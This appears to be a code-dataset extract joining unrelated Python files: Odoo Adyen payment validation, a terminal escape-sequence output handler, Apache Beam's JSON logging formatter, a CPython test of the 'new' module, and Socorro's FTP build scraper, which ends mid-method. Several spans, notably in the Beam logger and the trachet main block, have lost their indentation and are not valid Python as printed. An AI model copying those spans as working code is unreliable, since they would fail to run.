        # seller
        if data.get('skinCode') != tx.acquirer_id.adyen_skin_code:
            invalid_parameters.append(('skinCode', data.get('skinCode'), tx.acquirer_id.adyen_skin_code))
        # result
        if not data.get('authResult'):
            invalid_parameters.append(('authResult', data.get('authResult'), 'something'))

        return invalid_parameters

    def _adyen_form_validate(self, cr, uid, tx, data, context=None):
        """Update the transaction state from Adyen's authResult.

        AUTHORISED -> done, PENDING -> pending, anything else -> error.
        Returns True on done/pending, False on error.
        """
        status = data.get('authResult', 'PENDING')
        if status == 'AUTHORISED':
            tx.write({
                'state': 'done',
                'adyen_psp_reference': data.get('pspReference'),
                # 'date_validate': data.get('payment_date', fields.datetime.now()),
                # 'paypal_txn_type': data.get('express_checkout')
            })
            return True
        elif status == 'PENDING':
            tx.write({
                'state': 'pending',
                'adyen_psp_reference': data.get('pspReference'),
            })
            return True
        else:
            error = 'Adyen: feedback error'
            _logger.info(error)
            tx.write({
                'state': 'error',
                'state_message': error
            })
            return False
|
saitoha/trachet | refs/heads/master | trachet/output.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ***** BEGIN LICENSE BLOCK *****
# Copyright (C) 2012-2014 Hayaki Saito <user@zuse.jp>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# ***** END LICENSE BLOCK *****
from tffstub import tff
import constant
class OutputHandler(tff.DefaultHandler):
    """TFF handler for the output (terminal-bound) stream.

    Each handle_* method defers its work: it wraps the echo-and-trace
    logic in a closure and queues it on the controller, which replays the
    actions in order on handle_draw(). Every closure both forwards the
    original bytes to the context and feeds the tracer, returning the
    sequence-type constant for the controller's bookkeeping.
    """

    def __init__(self, controller, tracer):
        self._tracer = tracer
        self._controller = controller

    def handle_csi(self, context, parameter, intermediate, final):
        # CSI sequence: ESC [ <parameter> <intermediate> <final>
        def action():
            context.put(0x1b)  # ESC
            context.put(0x5b)  # [
            for c in parameter:
                context.put(c)
            for c in intermediate:
                context.put(c)
            context.put(final)
            self._tracer.set_output()
            self._tracer.handle_csi(context, parameter, intermediate, final)
            return constant.SEQ_TYPE_CSI
        self._controller.append(action)
        return True  # handled

    def handle_esc(self, context, intermediate, final):
        # Plain escape sequence: ESC <intermediate> <final>
        def action():
            context.put(0x1b)  # ESC
            for c in intermediate:
                context.put(c)
            context.put(final)
            self._tracer.set_output()
            self._tracer.handle_esc(context, intermediate, final)
            return constant.SEQ_TYPE_ESC
        self._controller.append(action)
        return True  # handled

    def handle_ss2(self, context, final):
        # Single shift 2: ESC N <final>
        def action():
            context.put(0x1b)  # ESC
            context.put(0x4e)  # N
            context.put(final)
            self._tracer.set_output()
            self._tracer.handle_ss2(context, final)
            return constant.SEQ_TYPE_SS2
        self._controller.append(action)
        return True  # handled

    def handle_ss3(self, context, final):
        # Single shift 3: ESC O <final>
        def action():
            context.put(0x1b)  # ESC
            context.put(0x4f)  # O
            context.put(final)
            self._tracer.set_output()
            self._tracer.handle_ss3(context, final)
            return constant.SEQ_TYPE_SS3
        self._controller.append(action)
        return True  # handled

    def handle_control_string(self, context, prefix, value):
        # Control string (DCS/OSC/...): ESC <prefix> <value> ST (ESC \)
        def action():
            context.put(0x1b)  # ESC
            context.put(prefix)
            for c in value:
                context.put(c)
            context.put(0x1b)  # ESC
            context.put(0x5c)  # \
            self._tracer.set_output()
            self._tracer.handle_control_string(context, prefix, value)
            return constant.SEQ_TYPE_STR
        self._controller.append(action)
        return True

    def handle_char(self, context, final):
        # Ordinary printable character.
        def action():
            context.put(final)
            self._tracer.set_output()
            self._tracer.handle_char(context, final)
            return constant.SEQ_TYPE_CHAR
        self._controller.append(action)
        return True  # handled

    def handle_invalid(self, context, seq):
        # Malformed sequence: pass the raw bytes through unchanged.
        def action():
            for c in seq:
                context.put(c)
            self._tracer.set_output()
            self._tracer.handle_invalid(context, seq)
            return constant.SEQ_TYPE_CHAR
        self._controller.append(action)
        return True  # handled

    def handle_resize(self, context, row, col):
        # Resize is not queued: forwarded to the tracer immediately.
        self._tracer.handle_resize(context, row, col)

    def handle_draw(self, context):
        # Flush the queued actions, then let the tracer redraw.
        self._controller.tick()
        self._tracer.handle_draw(context)
if __name__ == "__main__":
import doctest
doctest.testmod() |
rangadi/beam | refs/heads/master | sdks/python/apache_beam/runners/worker/logger.py | 6 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# cython: language_level=3
"""Python worker logging."""
from __future__ import absolute_import
import json
import logging
import threading
import traceback
from apache_beam.runners.worker import statesampler
# This module is experimental. No backwards-compatibility guarantees.
# Per-thread worker information. This is used only for logging to set
# context information that changes while work items get executed:
# work_item_id, step_name, stage_name.
class _PerThreadWorkerData(threading.local):
def __init__(self):
super(_PerThreadWorkerData, self).__init__()
# in the list, as going up and down all the way to zero incurs several
# reallocations.
self.stack = []
def get_data(self):
all_data = {}
for datum in self.stack:
all_data.update(datum)
return all_data
per_thread_worker_data = _PerThreadWorkerData()
class PerThreadLoggingContext(object):
  """A context manager to add per thread attributes."""

  def __init__(self, **kwargs):
    # kwargs become one frame on the per-thread context stack.
    self.kwargs = kwargs
    self.stack = per_thread_worker_data.stack

  def __enter__(self):
    self.enter()

  def enter(self):
    # Push on entry; get_data() merges all stacked frames.
    self.stack.append(self.kwargs)

  def __exit__(self, exn_type, exn_value, exn_traceback):
    self.exit()

  def exit(self):
    # Pop unconditionally (including on exception) to keep the stack balanced.
    self.stack.pop()
class JsonLogFormatter(logging.Formatter):
  """A JSON formatter class as expected by the logging standard module."""

  def __init__(self, job_id, worker_id):
    super(JsonLogFormatter, self).__init__()
    # Constant for the worker's lifetime; stamped on every record.
    self.job_id = job_id
    self.worker_id = worker_id

  def format(self, record):
    """Returns a JSON string based on a LogRecord instance.

    Args:
      record: A LogRecord instance. See below for details.

    Returns:
      A JSON string representing the record.

    A LogRecord instance has the following attributes and is used for
    formatting the final message.

    Attributes:
      created: A double representing the timestamp for record creation
        (e.g., 1438365207.624597). Note that the number contains also msecs and
        microsecs information. Part of this is also available in the 'msecs'
        attribute.
      msecs: A double representing the msecs part of the record creation
        (e.g., 624.5970726013184).
      msg: Logging message containing formatting instructions or an arbitrary
        object. This is the first argument of a log call.
      args: A tuple containing the positional arguments for the logging call.
      levelname: A string. Possible values are: INFO, WARNING, ERROR, etc.
      exc_info: None or a 3-tuple with exception information as it is
        returned by a call to sys.exc_info().
      name: Logger's name. Most logging is done using the default root logger
        and therefore the name will be 'root'.
      filename: Basename of the file where logging occurred.
      funcName: Name of the function where logging occurred.
      process: The PID of the process running the worker.
      thread: An id for the thread where the record was logged. This is not a
        real TID (the one provided by OS) but rather the id (address) of a
        Python thread object. Nevertheless having this value can allow to
        filter log statement from only one specific thread.
    """
    output = {}
    # Split the float timestamp into whole seconds and nanoseconds.
    output['timestamp'] = {
        'seconds': int(record.created),
        'nanos': int(record.msecs * 1000000)}
    # ERROR. INFO, DEBUG log levels translate into the same for severity
    # property. WARNING becomes WARN.
    output['severity'] = (
        record.levelname if record.levelname != 'WARNING' else 'WARN')

    # msg could be an arbitrary object, convert it to a string first.
    record_msg = str(record.msg)

    # Prepare the actual message using the message formatting string and the
    # positional arguments as they have been used in the log call.
    if record.args:
      try:
        output['message'] = record_msg % record.args
      except (TypeError, ValueError):
        # Mismatched format string/args: degrade gracefully instead of
        # dropping the record.
        output['message'] = '%s with args (%s)' % (record_msg, record.args)
    else:
      output['message'] = record_msg

    # The thread ID is logged as a combination of the process ID and thread ID
    # since workers can run in multiple processes.
    output['thread'] = '%s:%s' % (record.process, record.thread)

    # job ID and worker ID. These do not change during the lifetime of a worker.
    output['job'] = self.job_id
    output['worker'] = self.worker_id

    # Stage, step and work item ID come from thread local storage since they
    # change with every new work item leased for execution. If there is no
    # work item ID then we make sure the step is undefined too.
    data = per_thread_worker_data.get_data()
    if 'work_item_id' in data:
      output['work'] = data['work_item_id']

    tracker = statesampler.get_current_tracker()
    if tracker:
      output['stage'] = tracker.stage_name

      if tracker.current_state() and tracker.current_state().name_context:
        output['step'] = tracker.current_state().name_context.logging_name()

    # All logging happens using the root logger. We will add the basename of the
    # file and the function name where the logging happened to make it easier
    # to identify who generated the record.
    output['logger'] = '%s:%s:%s' % (
        record.name, record.filename, record.funcName)

    # Add exception information if any is available.
    if record.exc_info:
      output['exception'] = ''.join(
          traceback.format_exception(*record.exc_info))

    return json.dumps(output)
def initialize(job_id, worker_id, log_path):
    """Initialize root logger so that we log JSON to a file and text to stdout."""
    root = logging.getLogger()
    handler = logging.FileHandler(log_path)
    handler.setFormatter(JsonLogFormatter(job_id, worker_id))
    root.addHandler(handler)
    # Set default level to INFO to avoid logging various DEBUG level log
    # calls sprinkled throughout the code.
    root.setLevel(logging.INFO)
|
leafclick/intellij-community | refs/heads/master | python/testData/quickFixes/PyRemoveStatementQuickFixTest/only_after.py | 80 | class B(object):
def __init__(self): # error
pass
|
mancoast/CPythonPyc_test | refs/heads/master | cpython/251_test_new.py | 13 | from test.test_support import verbose, verify, TestFailed
import sys
import new
class Eggs:
    # Minimal classic (old-style) class used as a base for new.classobj().
    def get_yolks(self):
        # 'yolks' is set externally, e.g. via new.instance(C, {'yolks': 3})
        return self.yolks
# new.module(): build a module object at runtime, attach the class,
# register it in sys.modules and import it back by name.
print 'new.module()'
m = new.module('Spam')
if verbose:
    print m
m.Eggs = Eggs
sys.modules['Spam'] = m
import Spam
def get_more_yolks(self):
    """Return the instance's yolk count plus three bonus yolks."""
    bonus = 3
    return bonus + self.yolks
# new.classobj(): create a classic class derived from the synthetic
# module's Eggs, injecting an extra method through the dict argument.
print 'new.classobj()'
C = new.classobj('Spam', (Spam.Eggs,), {'get_more_yolks': get_more_yolks})
if verbose:
    print C
# new.instance(): an explicit dict seeds the instance attributes;
# with no dict (or None) the instance starts with an empty __dict__.
print 'new.instance()'
c = new.instance(C, {'yolks': 3})
if verbose:
    print c
o = new.instance(C)
verify(o.__dict__ == {},
       "new __dict__ should be empty")
del o
o = new.instance(C, None)
verify(o.__dict__ == {},
       "new __dict__ should be empty")
del o
def break_yolks(self):
    """Decrease the instance's yolk count by two (in place)."""
    self.yolks -= 2
# new.instancemethod(): bind break_yolks to instance c of class C and
# verify the bound method actually mutates c's state.
print 'new.instancemethod()'
im = new.instancemethod(break_yolks, c, C)
if verbose:
    print im
verify(c.get_yolks() == 3 and c.get_more_yolks() == 6,
       'Broken call of hand-crafted class instance')
im()
verify(c.get_yolks() == 1 and c.get_more_yolks() == 4,
       'Broken call of hand-crafted instance method')
# binding without an explicit class also works
im = new.instancemethod(break_yolks, c)
im()
verify(c.get_yolks() == -1)
# binding to None (unbound with no class) must be rejected
try:
    new.instancemethod(break_yolks, None)
except TypeError:
    pass
else:
    raise TestFailed, "dangerous instance method creation allowed"
# Verify that instancemethod() doesn't allow keyword args
try:
    new.instancemethod(break_yolks, c, kw=1)
except TypeError:
    pass
else:
    raise TestFailed, "instancemethod shouldn't accept keyword args"
# It's unclear what the semantics should be for a code object compiled at
# module scope, but bound and run in a function. In CPython, `c' is global
# (by accident?) while in Jython, `c' is local. The intent of the test
# clearly is to make `c' global, so let's be explicit about it.
codestr = '''
global c
a = 1
b = 2
c = a + b
'''
ccode = compile(codestr, '<string>', 'exec')
# Jython doesn't have a __builtins__, so use a portable alternative
import __builtin__
g = {'c': 0, '__builtins__': __builtin__}
# this test could be more robust
# new.function(): wrap the compiled code in a function and check that
# running it writes into the supplied globals dict.
print 'new.function()'
func = new.function(ccode, g)
if verbose:
    print func
func()
verify(g['c'] == 3,
       'Could not create a proper function object')
# test the various extended flavors of function.new
def f(x):
    """Return a closure g(y) that adds the captured x to its argument."""
    def g(y):
        total = x + y
        return total
    return g
# Exercise new.function()'s optional name / defaults / closure arguments.
g = f(4)
new.function(f.func_code, {}, "blah")
# defaults tuple (2,) makes the y argument optional
g2 = new.function(g.func_code, {}, "blah", (2,), g.func_closure)
verify(g2() == 6)
g3 = new.function(g.func_code, {}, "blah", None, g.func_closure)
verify(g3(5) == 9)
def test_closure(func, closure, exc):
    # Helper: building a function from func's code with a bad closure
    # must raise *exc*.
    try:
        new.function(func.func_code, {}, "", None, closure)
    except exc:
        pass
    else:
        print "corrupt closure accepted"
test_closure(g, None, TypeError)  # invalid closure
test_closure(g, (1,), TypeError)  # non-cell in closure
test_closure(g, (1, 1), ValueError)  # closure is wrong size
test_closure(f, g.func_closure, ValueError)  # no closure needed
print 'new.code()'
# bogus test of new.code()
# Note: Jython will never have new.code()
if hasattr(new, 'code'):
    def f(a): pass

    # Pull apart an existing code object so we can rebuild it field by
    # field through new.code().
    c = f.func_code
    argcount = c.co_argcount
    nlocals = c.co_nlocals
    stacksize = c.co_stacksize
    flags = c.co_flags
    codestring = c.co_code
    constants = c.co_consts
    names = c.co_names
    varnames = c.co_varnames
    filename = c.co_filename
    name = c.co_name
    firstlineno = c.co_firstlineno
    lnotab = c.co_lnotab
    freevars = c.co_freevars
    cellvars = c.co_cellvars
    d = new.code(argcount, nlocals, stacksize, flags, codestring,
                 constants, names, varnames, filename, name,
                 firstlineno, lnotab, freevars, cellvars)
    # test backwards-compatibility version with no freevars or cellvars
    d = new.code(argcount, nlocals, stacksize, flags, codestring,
                 constants, names, varnames, filename, name,
                 firstlineno, lnotab)
    try:  # this used to trigger a SystemError
        d = new.code(-argcount, nlocals, stacksize, flags, codestring,
                     constants, names, varnames, filename, name,
                     firstlineno, lnotab)
    except ValueError:
        pass
    else:
        raise TestFailed, "negative co_argcount didn't trigger an exception"
    try:  # this used to trigger a SystemError
        d = new.code(argcount, -nlocals, stacksize, flags, codestring,
                     constants, names, varnames, filename, name,
                     firstlineno, lnotab)
    except ValueError:
        pass
    else:
        raise TestFailed, "negative co_nlocals didn't trigger an exception"
    try:  # this used to trigger a Py_FatalError!
        d = new.code(argcount, nlocals, stacksize, flags, codestring,
                     constants, (5,), varnames, filename, name,
                     firstlineno, lnotab)
    except TypeError:
        pass
    else:
        raise TestFailed, "non-string co_name didn't trigger an exception"
    # new.code used to be a way to mutate a tuple...
    class S(str): pass
    t = (S("ab"),)
    d = new.code(argcount, nlocals, stacksize, flags, codestring,
                 constants, t, varnames, filename, name,
                 firstlineno, lnotab)
    verify(type(t[0]) is S, "eek, tuple changed under us!")
    if verbose:
        print d
|
bsmedberg/socorro | refs/heads/master | socorro/cron/jobs/ftpscraper.py | 1 | import re
import urllib2
import lxml.html
import json
import time
from configman import Namespace
from crontabber.base import BaseCronApp
from crontabber.mixins import (
as_backfill_cron_app,
with_postgres_transactions
)
from socorro.lib import buildutil
import os
"""
Socket timeout to prevent FTP from hanging indefinitely
Picked a 2 minute timeout as a generous allowance,
given the entire script takes about that much time to run.
"""
import socket
socket.setdefaulttimeout(60)
#==============================================================================
class RetriedError(IOError):
    """Raised when a URL could not be downloaded after repeated attempts."""

    def __init__(self, attempts, url):
        # how many attempts were made, and which URL kept failing
        self.attempts = attempts
        self.url = url

    def __str__(self):
        return '<{0}: {1} attempts at downloading {2}>'.format(
            self.__class__.__name__, self.attempts, self.url
        )
def urljoin(*parts):
    """Join URL segments, ensuring exactly one slash at each seam.

    Note: only a single leading slash is stripped from each appended
    segment, matching the seam-collapsing behaviour callers rely on.
    """
    joined = parts[0]
    for segment in parts[1:]:
        if not joined.endswith('/'):
            joined += '/'
        joined += segment[1:] if segment.startswith('/') else segment
    return joined
def patient_urlopen(url, max_attempts=4, sleep_time=20):
    """Fetch *url*, retrying on server and network errors.

    Returns the response body as a string, or None on HTTP 404.
    Other client errors (< 500) are raised immediately; server errors
    and URLErrors are retried after *sleep_time* seconds, and after
    *max_attempts* tries a RetriedError is raised.
    """
    attempts = 0
    while True:
        if attempts >= max_attempts:
            raise RetriedError(attempts, url)
        try:
            attempts += 1
            page = urllib2.urlopen(url)
        except urllib2.HTTPError, err:
            if err.code == 404:
                # a missing file is an expected condition, not a failure
                return
            if err.code < 500:
                raise
            # 5xx: transient server problem -- back off and retry
            time.sleep(sleep_time)
        except urllib2.URLError, err:
            # network-level failure -- back off and retry
            time.sleep(sleep_time)
        else:
            content = page.read()
            page.close()
            return content
def getLinks(url, startswith=None, endswith=None):
    """Return the links found on the page at *url*, filtered by prefix
    or suffix.

    When both filters are given, only *startswith* is applied.
    Returns [] when the page could not be fetched.
    """
    html = ''
    results = []
    content = patient_urlopen(url, sleep_time=30)
    if not content:
        return []
    html = lxml.html.document_fromstring(content)
    for element, attribute, link, pos in html.iterlinks():
        if startswith:
            if link.startswith(startswith):
                results.append(link)
        elif endswith:
            if link.endswith(endswith):
                results.append(link)
    return results
def parseBuildJsonFile(url, nightly=False):
    """Fetch a build JSON manifest and normalize a few keys.

    Returns the manifest dict with 'repository', 'build_type' and
    'buildID' derived from the raw fields, or None for a missing,
    empty or unparseable file.
    """
    content = patient_urlopen(url)
    if content:
        try:
            kvpairs = json.loads(content)
            # keep only the last path component of the source repo URL
            kvpairs['repository'] = kvpairs['moz_source_repo']\
                .split('/', -1)[-1]
            kvpairs['build_type'] = kvpairs['moz_update_channel']
            kvpairs['buildID'] = kvpairs['buildid']
            return kvpairs
        # bug 963431 - it is valid to have an empty file
        # due to a quirk in our build system
        except ValueError:
            pass
def parseInfoFile(url, nightly=False):
    """Fetch and parse a *_info.txt build info file.

    Returns (results, bad_lines): results maps keys to values (or the
    positional buildID/rev fields for nightlies); bad_lines collects
    release-file lines that did not split cleanly on '='.
    """
    content = patient_urlopen(url)
    results = {}
    bad_lines = []
    if not content:
        return results, bad_lines
    contents = content.splitlines()
    if nightly:
        # nightly info files are positional: buildID, rev[, altrev]
        results = {'buildID': contents[0], 'rev': contents[1]}
        if len(contents) > 2:
            results['altrev'] = contents[2]
    elif contents:
        results = {}
        for line in contents:
            if line == '':
                continue
            try:
                # NOTE(review): split('=') raises ValueError for lines whose
                # value contains '=' as well, sending them to bad_lines --
                # confirm intended (split('=', 1) would accept them)
                key, value = line.split('=')
                results[key] = value
            except ValueError:
                bad_lines.append(line)
    return results, bad_lines
def parseB2GFile(url, nightly=False, logger=None):
    """
    Parse the B2G manifest JSON file.

    Example: {"buildid": "20130125070201", "update_channel":
              "nightly", "version": "18.0"}

    Returns the manifest dict with a normalized 'build_type' (and a
    defaulted 'beta_number' for beta builds), or None for missing files
    or 'default' update channels.
    TODO handle exception if file does not exist
    """
    content = patient_urlopen(url)
    if not content:
        return
    results = json.loads(content)
    # bug 869564: Return None if update_channel is 'default'
    if results['update_channel'] == 'default' and logger:
        logger.warning(
            "Found default update_channel for buildid: %s. Skipping.",
            results['buildid']
        )
        return
    # Default 'null' channels to nightly
    results['build_type'] = results['update_channel'] or 'nightly'
    # Default beta_number to 1 for beta releases
    if results['update_channel'] == 'beta':
        results['beta_number'] = results.get('beta_number', 1)
    return results
def getJsonRelease(dirname, url):
    """Yield (platform, version, kvpairs) for every JSON build manifest
    found under the latest build of a *-candidates directory."""
    candidate_url = urljoin(url, dirname)
    version = dirname.split('-candidates')[0]
    builds = getLinks(candidate_url, startswith='build')
    if not builds:
        return
    # only the most recent build directory is scraped
    latest_build = builds.pop()
    build_url = urljoin(candidate_url, latest_build)
    version_build = os.path.basename(os.path.normpath(latest_build))
    for platform in ['linux', 'mac', 'win', 'debug']:
        platform_urls = getLinks(build_url, startswith=platform)
        for p in platform_urls:
            platform_url = urljoin(build_url, p)
            platform_local_url = urljoin(platform_url, 'en-US/')
            json_files = getLinks(platform_local_url, endswith='.json')
            for f in json_files:
                json_url = urljoin(platform_local_url, f)
                kvpairs = parseBuildJsonFile(json_url)
                if not kvpairs:
                    continue
                kvpairs['version_build'] = version_build
                yield (platform, version, kvpairs)
def getJsonNightly(dirname, url):
    """Yield (platform, repository, version, kvpairs) for every en-US or
    multi-locale JSON manifest in a nightly directory."""
    nightly_url = urljoin(url, dirname)
    json_files = getLinks(nightly_url, endswith='.json')
    for f in json_files:
        # filenames look like <product>-<version>.<locale>.<platform>.json
        if 'en-US' in f:
            pv, platform = re.sub('\.json$', '', f).split('.en-US.')
        elif 'multi' in f:
            pv, platform = re.sub('\.json$', '', f).split('.multi.')
        else:
            continue
        version = pv.split('-')[-1]
        # repository name = the non-numeric parts of the dir name
        repository = []
        for field in dirname.split('-'):
            if not field.isdigit():
                repository.append(field)
        repository = '-'.join(repository).strip('/')
        json_url = urljoin(nightly_url, f)
        kvpairs = parseBuildJsonFile(json_url, nightly=True)
        yield (platform, repository, version, kvpairs)
def getRelease(dirname, url):
    """Yield (platform, version, kvpairs, bad_lines) for every *_info.txt
    file in the latest build of a *-candidates directory."""
    candidate_url = urljoin(url, dirname)
    builds = getLinks(candidate_url, startswith='build')
    if not builds:
        #logger.info('No build dirs in %s' % candidate_url)
        return
    # only the most recent build directory is scraped
    latest_build = builds.pop()
    build_url = urljoin(candidate_url, latest_build)
    version_build = os.path.basename(os.path.normpath(latest_build))
    info_files = getLinks(build_url, endswith='_info.txt')
    for f in info_files:
        info_url = urljoin(build_url, f)
        kvpairs, bad_lines = parseInfoFile(info_url)
        platform = f.split('_info.txt')[0]
        version = dirname.split('-candidates')[0]
        kvpairs['version_build'] = version_build
        yield (platform, version, kvpairs, bad_lines)
def getNightly(dirname, url):
    """Yield (platform, repository, version, kvpairs, bad_lines) for every
    en-US or multi-locale .txt info file in a nightly directory."""
    nightly_url = urljoin(url, dirname)
    info_files = getLinks(nightly_url, endswith='.txt')
    for f in info_files:
        # filenames look like <product>-<version>.<locale>.<platform>.txt
        if 'en-US' in f:
            pv, platform = re.sub('\.txt$', '', f).split('.en-US.')
        elif 'multi' in f:
            pv, platform = re.sub('\.txt$', '', f).split('.multi.')
        else:
            ##return
            continue
        version = pv.split('-')[-1]
        # repository name = the non-numeric parts of the dir name
        repository = []
        for field in dirname.split('-'):
            if not field.isdigit():
                repository.append(field)
        repository = '-'.join(repository).strip('/')
        info_url = urljoin(nightly_url, f)
        kvpairs, bad_lines = parseInfoFile(info_url, nightly=True)
        yield (platform, repository, version, kvpairs, bad_lines)
def getB2G(dirname, url, backfill_date=None, logger=None):
    """
    Last mile of B2G scraping, calls parseB2G on .json
    Files look like: socorro_unagi-stable_2013-01-25-07.json

    Yields (platform, repository, version, kvpairs) per usable manifest.
    """
    url = '%s/%s' % (url, dirname)
    info_files = getLinks(url, endswith='.json')
    platform = None
    version = None
    repository = 'b2g-release'
    for f in info_files:
        # Pull platform out of the filename
        jsonfilename = os.path.splitext(f)[0].split('_')
        # Skip if this file isn't for socorro!
        if jsonfilename[0] != 'socorro':
            continue
        platform = jsonfilename[1]
        info_url = '%s/%s' % (url, f)
        kvpairs = parseB2GFile(info_url, nightly=True, logger=logger)
        # parseB2GFile() returns None when a file is
        # unable to be parsed or we ignore the file
        if kvpairs is None:
            continue
        version = kvpairs['version']
        yield (platform, repository, version, kvpairs)
#==============================================================================
@with_postgres_transactions()
@as_backfill_cron_app
class FTPScraperCronApp(BaseCronApp):
    """Backfillable cron app that scrapes the Mozilla FTP site for build
    information and records each build in the database."""
    app_name = 'ftpscraper'
    app_description = 'FTP Scraper'
    app_version = '0.1'

    required_config = Namespace()
    required_config.add_option(
        'products',
        default='firefox,mobile,thunderbird,seamonkey,b2g',
        from_string_converter=lambda line: tuple(
            [x.strip() for x in line.split(',') if x.strip()]
        ),
        doc='a comma-delimited list of URIs for each product')
    required_config.add_option(
        'base_url',
        default='http://ftp.mozilla.org/pub/mozilla.org',
        doc='The base url to use for fetching builds')
    required_config.add_option(
        'dry_run',
        default=False,
        doc='Print instead of storing builds')

    def run(self, date):
        """Scrape every configured product for *date*, each inside its
        own database transaction."""
        # record_associations
        logger = self.config.logger
        for product_name in self.config.products:
            logger.debug('scraping %s releases for date %s',
                         product_name, date)
            if product_name == 'b2g':
                self.database_transaction_executor(
                    self.scrapeB2G,
                    product_name,
                    date
                )
            elif product_name == 'firefox':
                # firefox publishes JSON build manifests
                self.database_transaction_executor(
                    self._scrape_json_releases_and_nightlies,
                    product_name,
                    date
                )
            else:
                # all other products still use *_info.txt files
                self.database_transaction_executor(
                    self._scrape_releases_and_nightlies,
                    product_name,
                    date
                )

    def _scrape_releases_and_nightlies(self, connection, product_name, date):
        # classic *_info.txt based scraping
        self.scrapeReleases(connection, product_name)
        self.scrapeNightlies(connection, product_name, date)

    def _scrape_json_releases_and_nightlies(
        self,
        connection,
        product_name,
        date
    ):
        # JSON-manifest based scraping (firefox)
        self.scrapeJsonReleases(connection, product_name)
        self.scrapeJsonNightlies(connection, product_name, date)

    def _insert_build(self, cursor, *args, **kwargs):
        """Insert one build row, or just print it when dry_run is set."""
        if self.config.dry_run:
            print "INSERT BUILD"
            for arg in args:
                print "\t", repr(arg)
            for key in kwargs:
                print "\t%s=" % key, repr(kwargs[key])
        else:
            buildutil.insert_build(cursor, *args, **kwargs)

    def _is_final_beta(self, version):
        # If this is a XX.0 version in the release channel,
        # return True otherwise, False
        return version.endswith('.0')

    def scrapeJsonReleases(self, connection, product_name):
        """Scrape JSON-manifest release builds and insert them."""
        prod_url = urljoin(self.config.base_url, product_name, '')
        logger = self.config.logger
        cursor = connection.cursor()
        for directory in ('nightly', 'candidates'):
            if not getLinks(prod_url, startswith=directory):
                logger.debug('Dir %s not found for %s',
                             directory, product_name)
                continue
            url = urljoin(self.config.base_url, product_name, directory, '')
            releases = getLinks(url, endswith='-candidates/')
            for release in releases:
                for info in getJsonRelease(release, url):
                    platform, version, kvpairs = info
                    build_type = 'release'
                    beta_number = None
                    repository = kvpairs['repository']
                    if 'b' in version:
                        # e.g. "27.0b3" -> version "27.0", beta_number "3"
                        build_type = 'beta'
                        version, beta_number = version.split('b')
                    if kvpairs.get('buildID'):
                        build_id = kvpairs['buildID']
                        version_build = kvpairs['version_build']
                        self._insert_build(
                            cursor,
                            product_name,
                            version,
                            platform,
                            build_id,
                            build_type,
                            beta_number,
                            repository,
                            version_build,
                            ignore_duplicates=True
                        )
                    # a XX.0 release also gets recorded as a "final beta"
                    if (self._is_final_beta(version)
                        and build_type == 'release'
                        and version > '26.0'):
                        logger.debug('is final beta version %s', version)
                        repository = 'mozilla-beta'
                        build_id = kvpairs['buildID']
                        build_type = 'beta'
                        version_build = kvpairs['version_build']
                        # just force this to 99 until
                        # we deal with version_build properly
                        beta_number = 99
                        self._insert_build(
                            cursor,
                            product_name,
                            version,
                            platform,
                            build_id,
                            build_type,
                            beta_number,
                            repository,
                            version_build,
                            ignore_duplicates=True
                        )

    def scrapeJsonNightlies(self, connection, product_name, date):
        """Scrape JSON-manifest nightly builds for *date* and insert them."""
        nightly_url = urljoin(self.config.base_url, product_name, 'nightly',
                              date.strftime('%Y'),
                              date.strftime('%m'),
                              '')
        cursor = connection.cursor()
        dir_prefix = date.strftime('%Y-%m-%d')
        nightlies = getLinks(nightly_url, startswith=dir_prefix)
        for nightly in nightlies:
            for info in getJsonNightly(nightly, nightly_url):
                platform, repository, version, kvpairs = info
                build_type = 'nightly'
                if version.endswith('a2'):
                    # "a2" suffix marks the aurora channel
                    build_type = 'aurora'
                if kvpairs.get('buildID'):
                    build_id = kvpairs['buildID']
                    self._insert_build(
                        cursor,
                        product_name,
                        version,
                        platform,
                        build_id,
                        build_type,
                        kvpairs.get('beta_number', None),
                        repository,
                        ignore_duplicates=True
                    )

    def scrapeReleases(self, connection, product_name):
        """Scrape *_info.txt release builds and insert them."""
        prod_url = urljoin(self.config.base_url, product_name, '')
        # releases are sometimes in nightly, sometimes in candidates dir.
        # look in both.
        logger = self.config.logger
        cursor = connection.cursor()
        for directory in ('nightly', 'candidates'):
            if not getLinks(prod_url, startswith=directory):
                logger.debug('Dir %s not found for %s',
                             directory, product_name)
                continue
            url = urljoin(self.config.base_url, product_name, directory, '')
            releases = getLinks(url, endswith='-candidates/')
            for release in releases:
                for info in getRelease(release, url):
                    platform, version, kvpairs, bad_lines = info
                    if kvpairs.get('buildID') is None:
                        self.config.logger.warning(
                            "BuildID not found for %s on %s",
                            release, url
                        )
                        continue
                    build_type = 'Release'
                    beta_number = None
                    repository = 'mozilla-release'
                    if 'b' in version:
                        build_type = 'Beta'
                        version, beta_number = version.split('b')
                        repository = 'mozilla-beta'
                    for bad_line in bad_lines:
                        self.config.logger.warning(
                            "Bad line for %s on %s (%r)",
                            release, url, bad_line
                        )
                    # Put a build into the database
                    build_id = kvpairs['buildID']
                    self._insert_build(
                        cursor,
                        product_name,
                        version,
                        platform,
                        build_id,
                        build_type,
                        beta_number,
                        repository,
                        ignore_duplicates=True
                    )
                    # If we've got a final beta, add a second record
                    if self._is_final_beta(version):
                        repository = 'mozilla-beta'
                        self._insert_build(
                            cursor,
                            product_name,
                            version,
                            platform,
                            build_id,
                            build_type,
                            beta_number,
                            repository,
                            ignore_duplicates=True
                        )

    def scrapeNightlies(self, connection, product_name, date):
        """Scrape *_info.txt nightly builds for *date* and insert them."""
        nightly_url = urljoin(self.config.base_url, product_name, 'nightly',
                              date.strftime('%Y'),
                              date.strftime('%m'),
                              '')
        cursor = connection.cursor()
